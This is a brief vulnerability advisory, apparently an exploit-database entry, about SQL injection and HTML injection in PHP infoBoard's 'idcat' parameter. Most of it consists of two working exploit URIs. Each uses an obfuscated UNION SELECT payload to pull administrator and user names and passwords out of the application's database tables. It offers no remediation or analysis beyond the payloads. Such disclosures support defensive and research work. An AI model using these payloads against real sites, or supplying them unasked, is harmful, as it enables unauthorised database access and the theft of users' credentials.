PHP infoBoard 'idcat' Parameter SQL Injection and HTML Injection Vulnerabilities

PHP infoBoard 'idcat' Parameter SQL Injection and HTML Injection Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_admin--&showpage=10
http://www.example.com/[path]/showtopic.php?idcat=-1'/**/UNION/**/SELECT/**/1,2,3,4,concat(info_name,0x3a,0x3a,0x3a,info_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/**/FROM/**/[prefix]info_user--&showpage=10